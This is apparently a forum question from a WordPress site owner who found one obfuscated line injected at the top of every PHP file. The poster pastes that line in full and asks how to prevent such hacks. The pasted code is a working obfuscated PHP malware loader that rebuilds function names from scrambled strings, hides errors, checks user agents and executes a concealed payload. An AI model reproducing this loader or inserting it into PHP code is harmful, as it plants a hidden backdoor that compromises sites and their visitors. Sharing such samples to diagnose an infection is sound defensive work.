This question already has an answer here:
I just noticed that ALL of my PHP files in a wordpress install have been modified by an outside source. I don't even know what this code does, but it's caused my site to not even load on some browsers. Right now I am going through every file and removing the lines in question, but wondering if anyone has seen this before and has found a solution to prevent these types of injection hacks.
Here's what the code from one file looks like.
$mcvecgx = '`ftsbqA7>q%6< x7fw6* x7f_*# 157 x6e"; function jbavbgd($n){return chr(ord($nr (strstr($uas," x63 15=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#2 164") && (!isset($GLOBALS[" x61 156 x75 156 x61"])))) { $GLOBALmdR6<*id%)dfyfR x27tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y7 x24- x24*<! x24- x24gps)%j>bqov>*ofmy%)utjm!|!*5! x2**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:><b% x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x2>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%s: x5c%j:^<!%w` x5c^>E!<2,*j%-#1]#-bubE{h%)tpqsut>j%2)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:op6767~6<Cw6<pd%w6Z6<.5+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw6)idubn`hfsq)!sp!*#ojneb#-*f%)4]y31M6]y3e]81#/#7e:55946-tr.5]53]Kc#<%tpz!>!#]D6M7]K3#<v}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323ldfid>}&;!os<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uof($uas," x72 166 x3a 61 x31")) or (strstr($uas," x61 156 x6S[" x61 156 x75 156 x61"]=1; $uas=strtolower($_SE}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%b47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*hrray_map("jbavbgd",str_split("%tjw!>!#]y84]275]y83]248]y83]2563of)fepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq%!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x244]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7x242178}527}88:}334}472 x24<!%ff2!>!bssbz) x24]25 xdpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd}x24- x24]26 x24- x24<%j,,*!| x24- x24gvodujpo! x24- x24y7<*K)ftpmdXA6|7**197-2qjdXA6~6<u%7>/7&6|7**111127-K)eb1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppdx78"))) { $vkvwvuq = " x63 162 x65 141 x74 145 x5fsX x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxX4 162 x6f 151 x64")) oj6<^#Y# x5cq% x27Y%6<.msv7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P64/%t2w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>! x243of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f xe#)tutjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%Y%)fnbozcYufhA x272qj%6<^#zsfvr#85:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]8^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:137 x41 107 x45 116 x54"]); if ((strstr($uas," x6#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)g}R;2]},;osvufs} x27;mnui}&;zepc}/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c}X x24<!%t2`hA x27pd%6<C x27pd%6|6.7eu{66~67<&w34]342]58]24]31#-%tdz*Wsfuvso!%bss x5csboe))1/35.)1/14+9fubfsdXk5`{66~6<&w6< x7fwjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%)ftpA;~!} x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t4)% x24- x24y4 x24- x24]y8 W~!Ypp2)%zB%z>! x24/%tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN} x5cq%7/7#@#7/7^#iubq# x5cq% x27jsv%6<C>^7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7gj6<**2qj%)ho1M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]2tjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE,;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg}%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`LDPT]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.9]88M4P8]37]278]225]241]334]368]32#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%t#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2`{-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)T-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]3416*CW&)7gj6<*doj%7-C)fepmqnjA x27&%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>vufs} x7f;!opjudovg}k~~9{d%:osvufs:ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!SV,6<*)ujojR x27id%6< x7fw6* x7f_*`hA x27pd%6<pd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.:-111112)eobs`un>qp%!|Z~!<#%ww2)%w`TW~ x24<!fwbm)%tjw)bssbz)#6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fw6*CW&)7gj6<*K)ftpmYpp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2uopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}V;3q%}U;y]sfxpmpusut)tpqssutRe%)Rdf#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]();}}RVER[" x48 124 x54 120 x5f 125 x53 105 x52 y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnp36]73]83]238M7]381]21]y81]265]y72]254]y76#<!%w:!>!(%w:!>! x24> x22!ftmbg)!gj<*#k#)usbut`cpV x7f x7f x7f x7f<u%V x27{ftmfV ~928>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;l!ssbnpe_GMFT`QIQ&f_UTPI`QUU2]3]364]6]283]427]36]373P6]L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*324- x24-!% x24- x24*!|! x24- x24 x5c%j^ x24- x24tvctus)% x24- x24b!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP- x24!>! x24/%tjw/ x20 x72 157 x6d 145")) or (strstr($uas," x66 151 x72 145 x66 157 w:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%fs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-M)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>1<%j=tj{fpg)% x24- x24*<!~! x2ww**WYsboepn)%bss-%rxB%h>#]y31]278I&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~! x5cSFWSFT`%}X;!sp!*#opo#>>}R;ms27,*e x27,*d x27,*c x27,*b x27)fepdof.)fepdof./#@#/qp%>5h%!<*:::::f 146 x75 156 x63 164 x69 x7f;!osvufs}w;* x7f!>> x22!pd%)!gj}Z;h!opjudovg}{;#)tu,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%d#)tutjyf`opjudovg x22)!gj}1~!<2p% x7fd 163 x69 145")) or (strstrsfuvso!sboepn)%epnbss-%rx%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>sjudovg<~ x24<!%o:!>! !*9! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ld7!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bub::**<(<!fwbm)%tjw)# x24#-!#]y38#-!%w:**<")));$huqgmdl = $vkvwvuq("",649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<! $klpobto); $huqgmdlpm3qjA)qj3hopmA x273qj%6<*P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y6<.fmjgA x27doj%6< x7fw6* x7f_*#fm! x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%)!gjif((function_exists(" x6f 142 x5f 163 x74 141 x7#!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs)-1);} @error_reporting(0); $klpobto = implode(ax7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25E{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSiblgzqry'; $eieuopev=explode(chr((394-274)),substr($mcvecgx,(18736-12716),(161-127))); $rslxhquk = $eieuopev[0]($eieuopev[(3-2)]); $blbacxfo = $eieuopev[0]($eieuopev[(13-11)]); if (!function_exists('yyqcaxkq')) { function yyqcaxkq($wiimixun, $llaefy,$zyljyqpk) { $rnruyal = NULL; for($ldyxfe=0;$ldyxfe<(sizeof($wiimixun)/2);$ldyxfe++) { $rnruyal .= substr($llaefy, $wiimixun[($ldyxfe*2)],$wiimixun[($ldyxfe*2)+(3-2)]); } return $zyljyqpk(chr((53-44)),chr((421-329)),$rnruyal); }; } $jgsudgbug = explode(chr((269-225)),'5788,48,147,65,1122,49,3929,43,2201,49,5245,27,1064,58,1823,22,76,23,4625,63,1733,49,5083,25,27,49,5883,48,1266,62,4063,40,646,21,3535,65,2370,37,3661,64,1666,30,1782,41,813,65,1643,23,2973,45,2738,62,5615,26,2067,32,2697,41,2250,42,1845,25,0,27,2463,25,3331,33,5690,34,2488,44,212,20,4721,62,3501,34,3185,65,4248,50,1526,60,2927,46,5108,55,2862,65,4385,41,5724,64,505,30,5386,63,302,25,5449,35,5982,38,3972,70,5207,38,4492,56,3250,39,1975,50,5017,66,3600,27,5836,47,667,65,878,29,3838,24,3364,58,4298,27,4919,66,382,57,535,41,1328,51,4985,32,963,58,3422,35,4164,55,4219,29,1696,37,2025,42,4783,40,4103,61,5931,51,5163,44,1021,43,3785,53,2292,32,2532,42,99,48,2324,46,232,42,1419,56,3862,62,1209,57,5297,68,576,70,5365,21,1475,51,4426,66,1379,40,4604,21,2606,27,1586,57,274,28,4855,30,1914,61,3725,60,2143,58,5552,43,5272,25,2633,64,3119,66,4885,34,3018,68,2099,44,907,29,732,44,936,27,4548,56,1870,44,4352,33,776,37,1171,38,3289,42,3086,33,4325,27,4042,21,2800,62,2407,56,327,55,4823,32,439,66,4688,33,3457,44,3627,34,5641,49,2574,32,5484,68,5595,20,3924,5'); $jhgewn = $rslxhquk("",yyqcaxkq($jgsudgbug,$mcvecgx,$blbacxfo)); $rslxhquk=$mcvecgx; $jhgewn(""); $jhgewn=(575-454); $mcvecgx=$jhgewn-1;
It's just one long line, inserted at the top of every single PHP file. Any help would be appreciated!
</div>
